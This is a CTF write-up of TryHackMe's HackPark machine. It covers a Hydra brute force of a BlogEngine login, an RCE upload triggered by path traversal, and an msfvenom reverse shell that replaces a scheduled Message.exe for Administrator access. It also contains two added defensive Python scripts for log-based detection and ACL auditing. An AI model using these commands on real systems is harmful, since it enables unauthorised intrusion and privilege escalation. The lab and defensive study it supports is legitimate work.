
HackPark Writeup [THM]

HackPark is a Windows machine from TryHackMe. It consists of brute-forcing a login form, exploiting an RCE vulnerability in its CMS and, using WinPEAS, identifying a binary that can be replaced by a shell to obtain administrator privileges.

Enumeration

Running nmap:

nmap -sC -sV -o nmap.txt -Pn 10.10.45.21
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries
| /Account/*.* /search /search.aspx /error404.aspx
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open  ssl/ms-wbt-server?
|_ssl-date: 2020-07-29T16:16:07+00:00; +1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We see that port 80 is open; browsing to it, we see a picture of Pennywise:

Web

Going through the menu, a login page is found, running BlogEngine.NET:

Login

In order to log in, we are going to brute-force the form with Hydra, using admin as the username:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.79.241  http-post-form "/Account/login.aspx:__VIEWSTATE=ScTUsDEL61RxXQbUkxPIvjWwWIPtRoGua7VlvlhkXMv83IlH8nDZNBJap5qDDRHYpohgQkDHiy%2FBC%2BxgOpa%2BQyclcuurGR6oEQrtrgMMab51BRVITHbw51etTYHg%2BOSqlTEdhO1sq6LyFJ6OiiTP6d9DJf02wqbnAd2tPNuj2XvUivov&__EVENTVALIDATION=IwDYcG9QBNf8p2xPKx%2B%2Fw5JxMDpBvm8H7wN1ksA5dw9A8UBpnwOCo0Dw%2BPk5zNJmkB9lQ%2FliisMfMuMuK0XXTqgvEqLeivDFKIVc5TL58r9bwhfN6No%2FVNcCXAAYsaZZOdkMyqjZVNaOltsfMh1u4e0p9aFSTmWecZYwxusByDyG%2FSae&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed" -t 64
[80][http-post-form] host: 10.10.79.241   login: admin   password: ******
1 of 1 target successfully completed, 1 valid password found

With the credentials obtained (according to the writeup rules the password can't be shown), we access the CMS and see that the machine is running BlogEngine version 3.3.6:

Blog

Exploitation

Doing a quick search for exploits, I found the following RCE vulnerability: https://www.exploit-db.com/exploits/46353

In order to obtain a reverse shell, we need to copy that code to a file named PostView.ascx, then browse to http://IP/admin/app/editor/editpost.cshtml to upload the file:

Shell

To trigger the reverse shell, we need to browse to http://IP/?theme=../../App_Data/files

Checking netcat, we obtain a reverse connection:

nc -lvnp 443
listening on [any] 443 ...
connect to [10.11.14.106] from (UNKNOWN) [10.10.79.241] 49326
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved
c:\windows\system32\inetsrv>whoami
iis apppool\blog

We see that we have obtained a shell as the IIS application pool account (iis apppool\blog).
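From the defender's side, both web steps above leave a clear trace in the IIS logs: the Hydra run is a burst of POSTs to /Account/login.aspx from one client, and the shell trigger is a request whose query string carries theme=../../ . The following script is an added example written for this page, not code from the post or from BlogEngine; it parses IIS W3C log lines and flags both patterns. The log it scans is a constructed sample (a reduced set of W3C fields, reusing the two addresses from the post), and the thresholds (20 login POSTs within 60 seconds) are assumptions to tune per site.

```python
"""Detect, in IIS W3C logs, a password-guessing burst against
/Account/login.aspx and a '..' path traversal in the query string.
The log scanned here is a constructed sample, not a log from the target."""
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote


def build_sample_log():
    """Constructed IIS 8.5 W3C log: 25 login POSTs in 3 seconds from one
    client, then a traversal request, then one normal login elsewhere."""
    lines = [
        "#Software: Microsoft Internet Information Services 8.5",
        "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query "
        "s-port cs-username c-ip sc-status",
        "2020-07-29 16:19:58 10.10.79.241 GET / - 80 - 10.11.14.106 200",
    ]
    for i in range(25):
        lines.append(f"2020-07-29 16:20:{i // 10:02d} 10.10.79.241 POST "
                     f"/Account/login.aspx - 80 - 10.11.14.106 200")
    lines.append("2020-07-29 16:25:10 10.10.79.241 GET / "
                 "theme=../../App_Data/files 80 - 10.11.14.106 200")
    lines.append("2020-07-29 16:30:00 10.10.79.241 POST /Account/login.aspx "
                 "- 80 - 192.0.2.7 302")
    return "\n".join(lines) + "\n"


def parse_iis_log(text):
    """Parse W3C lines into dicts keyed by the names in the #Fields header.
    IIS writes '+' for spaces inside a field, so whitespace splitting is safe."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated line: skip rather than misalign columns
        row = dict(zip(fields, values))
        row["ts"] = datetime.strptime(row["date"] + " " + row["time"],
                                      "%Y-%m-%d %H:%M:%S")
        rows.append(row)
    return rows


def detect_login_bruteforce(rows, threshold=20, window_seconds=60):
    """Return {client ip: peak attempts} for clients that POSTed to the login
    page at least `threshold` times inside any `window_seconds` window."""
    attempts = defaultdict(list)
    for r in rows:
        if r["cs-method"] == "POST" and r["cs-uri-stem"].lower() == "/account/login.aspx":
            attempts[r["c-ip"]].append(r["ts"])
    flagged = {}
    window = timedelta(seconds=window_seconds)
    for ip, times in attempts.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):          # sliding window over timestamps
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def detect_path_traversal(rows):
    """Return (client ip, stem, raw query) for requests whose query string
    contains a '..' segment after URL decoding (decoded twice so that
    double-encoded variants such as %252e%252e%252f are caught too)."""
    hits = []
    for r in rows:
        decoded = unquote(unquote(r["cs-uri-query"]))
        if "../" in decoded or "..\\" in decoded:
            hits.append((r["c-ip"], r["cs-uri-stem"], r["cs-uri-query"]))
    return hits


if __name__ == "__main__":
    rows = parse_iis_log(build_sample_log())
    print("login guessing:", detect_login_bruteforce(rows))
    print("traversal:", detect_path_traversal(rows))
```

On real logs, point parse_iis_log at the contents of the site's log directory (by default under inetpub\logs\LogFiles) and keep the #Fields header handling, since the column set differs between servers; the traversal check looks only at the query string because that is where BlogEngine's theme parameter is carried.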

Privilege Escalation

For this part we are going to use an enumeration tool called WinPEAS: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

To transfer it, we start an SMB server on our machine:

smbserver.py smbfolder .

From the remote machine, we use copy to fetch the binary:

c:\tmp>copy \\10.11.14.106\smbfolder\winPEAS.exe
        1 file(s) copied.

After reading through all of winPEAS's colored output, I found this uncommon binary:

WindowsScheduler(Splinterware Software Solutions - System Scheduler Service)[C:\PROGRA~2\SYSTEM~1\WService.exe] - Auto - Running
Possible DLL Hijacking in binary folder: C:\Program Files (x86)\SystemScheduler (Everyone [WriteData/CreateFiles])

Going to that directory, we find the following log file:

08/07/20 04:06:34,Process Ended. PID:480,ExitCode:4,Message.exe (Administrator)
08/07/20 04:07:02,Event Started Ok, (Administrator)
08/07/20 04:07:33,Process Ended. PID:2420,ExitCode:4,Message.exe (Administrator)
08/07/20 04:08:02,Event Started Ok, (Administrator)
08/07/20 04:08:33,Process Ended. PID:800,ExitCode:4,Message.exe (Administrator)

Therefore, with this information, and knowing that Everyone can write to that directory, we can replace Message.exe with a shell generated with msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.14.106 LPORT=8888 -f exe -o Message.exe

We first rename the original Message.exe and then copy in our reverse shell:

C:\Program Files (x86)\SystemScheduler>ren Message.exe Message.exe.bak
C:\Program Files (x86)\SystemScheduler>copy \\10.11.14.106\smbfolder\Message.exe
        1 file(s) copied.

Finally, after a few seconds, we obtain a reverse connection as Administrator:

nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.11.14.106] from (UNKNOWN) [10.10.79.241] 49517
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\>whoami
hackpark\administrator
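The whole escalation rests on one misconfiguration: a scheduler runs a program as Administrator out of a directory that Everyone can write to. The script below is an added example written for this page (not the author's code, not WinPEAS and not part of System Scheduler) that audits for exactly that pairing: it reads the scheduler's log format shown above to learn which executables run under which account, parses the output of icacls for the service directory, and reports every privileged program whose directory carries a write-capable ACE for a principal outside a trusted set. The log lines and icacls output are constructed samples modelled on the lines in this post; the trusted-principal set, the set of rights treated as write access, and the list of privileged account names are assumptions.

```python
"""Audit for a program that a scheduler runs under a privileged account
from a directory that low-privileged principals can write to. Inputs are
System Scheduler's log format and the output of `icacls <dir>`; both
samples below are constructed for this example."""
import re

SCHEDULER_DIR = r"C:\Program Files (x86)\SystemScheduler"

# Constructed sample in the same line format as the Events log above.
SCHEDULER_LOG = """08/07/20 04:06:34,Process Ended. PID:480,ExitCode:4,Message.exe (Administrator)
08/07/20 04:07:02,Event Started Ok, (Administrator)
08/07/20 04:07:33,Process Ended. PID:2420,ExitCode:4,Message.exe (Administrator)
"""

# Constructed sample of what icacls prints for a directory carrying the
# weak ACE that WinPEAS reported (Everyone may write into it).
ICACLS_OUTPUT = SCHEDULER_DIR + r""" Everyone:(OI)(CI)(W)
                                     NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                     BUILTIN\Administrators:(I)(OI)(CI)(F)
                                     BUILTIN\Users:(I)(OI)(CI)(RX)
                                     CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Assumed: principals that may legitimately write to a service's install
# directory. CREATOR OWNER is an inheritance placeholder, not a real user.
TRUSTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators",
           "NT SERVICE\\TrustedInstaller", "CREATOR OWNER"}
# icacls rights that let a principal add or replace files in a directory:
# full, modify, write, write-data, append-data (create files/subfolders).
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD"}
# Assumed: account names whose scheduled programs are worth flagging.
PRIVILEGED_ACCOUNTS = {"administrator", "system"}

PROCESS_RE = re.compile(
    r"Process Ended\. PID:\d+,ExitCode:-?\d+,(\S+) \(([^)]+)\)")


def scheduled_programs(log_text):
    """Return the distinct (executable, account) pairs the scheduler ran."""
    pairs = []
    for line in log_text.splitlines():
        m = PROCESS_RE.search(line)
        if m and (m.group(1), m.group(2)) not in pairs:
            pairs.append((m.group(1), m.group(2)))
    return pairs


def parse_icacls(output, path):
    """Parse `icacls path` output into a list of (principal, [rights]).
    The first line starts with the path itself; later lines are indented."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        if ":(" not in line:          # blank line or the summary line
            continue
        principal, flags = line.rsplit(":", 1)
        rights = [r for grp in re.findall(r"\(([^)]*)\)", flags)
                  for r in grp.split(",")]
        aces.append((principal, rights))
    return aces


def weak_aces(aces):
    """ACEs that grant a write right to a principal outside the trusted set."""
    return [(p, r) for p, r in aces
            if p not in TRUSTED and WRITE_RIGHTS.intersection(r)]


def find_privileged_writable(log_text, icacls_output, path):
    """Pair each program the scheduler runs as a privileged account with every
    weak ACE on its directory; each pair is a replace-the-binary escalation."""
    findings = []
    weak = weak_aces(parse_icacls(icacls_output, path))
    for exe, account in scheduled_programs(log_text):
        if account.lower() not in PRIVILEGED_ACCOUNTS:
            continue
        for principal, rights in weak:
            granted = ",".join(sorted(WRITE_RIGHTS.intersection(rights)))
            findings.append((exe, account, principal, granted))
    return findings


if __name__ == "__main__":
    for f in find_privileged_writable(SCHEDULER_LOG, ICACLS_OUTPUT, SCHEDULER_DIR):
        print("%s runs as %s from a directory where %s has %s" % f)
```

The fix the audit points at is on the ACL, not on the scheduler: removing the Everyone write ACE from the SystemScheduler directory (and confirming that the program the scheduler launches lives under an Administrators-only path) closes this route regardless of which account the task runs as.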
This post is licensed under CC BY 4.0 by the author.